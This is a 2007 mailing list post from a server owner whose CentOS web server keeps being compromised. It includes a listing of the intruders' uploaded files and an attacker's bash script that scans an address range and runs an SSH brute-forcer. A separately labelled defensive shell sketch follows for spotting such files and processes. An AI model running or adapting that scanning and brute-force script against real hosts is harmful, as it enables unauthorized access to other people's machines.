[ubuntu-uk] off topic - server security
Sean Miller
sean at seanmiller.net
Thu Dec 27 07:34:23 GMT 2007

I am aware this isn't Ubuntu related, but I'm tearing my hair out.

For the past week or so some folks have been constantly hacking my
webserver... it's running CentOS I believe, but I don't have the knowledge
to work out how they're getting in.

I've changed the SSH port from 22, have run rkhunter and that shows nothing
but every time I leave the thing for 3-4 hours there's loads of dodgy
processes running and the httpd has died. The processes are always running
as "apache", so clearly it's the webserver and/or php and whatever which is
being compromised.

What's the insecurity that I can't figure out? Anybody have any ideas?

Here's an example of the sort of stuff they upload...

[root at s15247463 ssh]# ls -l
total 1668
-rwxr-xr-x 1 apache apache 307 Jul 29 2005 a
-rwxr-xr-x 1 apache apache 7143 Jun 28 14:24 mass
-rwxr-xr-x 1 apache apache 4815 Dec 13 2005 nobash.txt
-rwxr-xr-x 1 apache apache 273836 Dec 19 2005 pass.txt
-rwxr-xr-x 1 apache apache 5944 May 15 2005 pscan2
-rwxr-xr-x 1 apache apache 5797 May 15 2005 pscan2.c
-rwxr-xr-x 1 apache apache 307 Jul 29 2005 scan
-rw-r--r-- 1 apache apache 0 Dec 27 07:18 scan.log
-rwxr-xr-x 1 apache apache 1384518 Jun 5 2005 sshd
-rwxr-xr-x 1 apache apache 106 Dec 12 2005 vuln.txt

#!/bin/bash
#
# by lizard
#
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi
rm -rf scan.log
echo -e "A little ssh bruteforce tool\n\r\t - by andr & Ick\n\n"
echo
echo
sleep 1
././pscan2 $1 22
echo "[+] Alright.. bruteforcing..."
./sshd 100
echo "[+] Sleeping 10 secs"
sleep 10

Sean
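
Added example, not part of Sean's message: a triage sketch for the two symptoms described above, executables owned by the web server account and non-httpd processes running as it. The function names, the WEB_USER/WEB_BIN defaults and the process sample are assumptions made for illustration; the listing sample reuses three lines from the post plus one constructed root-owned line.

```shell
#!/bin/sh
# Assumed account and binary names; override in the environment if they differ.
WEB_USER=${WEB_USER:-apache}
WEB_BIN=${WEB_BIN:-httpd}

# Read `ls -l` output on stdin and print the name of every regular file owned
# by WEB_USER with an execute (or setuid/sticky) bit set. The web server
# account has no reason to own executables. Names with spaces are truncated.
exec_files_owned_by_web_user() {
    awk -v u="$WEB_USER" '$1 ~ /^-.*[xst]/ && $3 == u { print $NF }'
}

# Read `ps -eo user,pid,ppid,comm` output on stdin and print "PID COMMAND" for
# every process running as WEB_USER whose command is not WEB_BIN. A command
# called "sshd" under the web account is flagged too: the real daemon does not
# run as apache, and the listing in the post contains a file with that name.
non_web_procs_as_web_user() {
    awk -v u="$WEB_USER" -v b="$WEB_BIN" \
        'NR > 1 && $1 == u && $4 != b { print $2, $4 }'
}

# Three lines from the listing in the post, plus one constructed root-owned file.
SAMPLE_LS='total 1668
-rwxr-xr-x 1 apache apache 5944 May 15 2005 pscan2
-rw-r--r-- 1 apache apache 0 Dec 27 07:18 scan.log
-rwxr-xr-x 1 apache apache 1384518 Jun 5 2005 sshd
-rwxr-xr-x 1 root root 100 Jan 1 2007 backup.sh'

# Constructed process table for illustration.
SAMPLE_PS='USER PID PPID COMMAND
root 2101 1 httpd
apache 2110 2101 httpd
apache 8842 1 pscan2
apache 8850 1 sshd
root 1790 1 sshd'

echo "Executables owned by $WEB_USER:"
printf '%s\n' "$SAMPLE_LS" | exec_files_owned_by_web_user
echo "Non-$WEB_BIN processes running as $WEB_USER:"
printf '%s\n' "$SAMPLE_PS" | non_web_procs_as_web_user

# On a live host (as root), feed the same functions real data:
#   ls -l <directory> | exec_files_owned_by_web_user
#   ps -eo user,pid,ppid,comm | non_web_procs_as_web_user
```

The command name reported by ps can be chosen by whoever started the process, so a clean result from the second function does not clear the host.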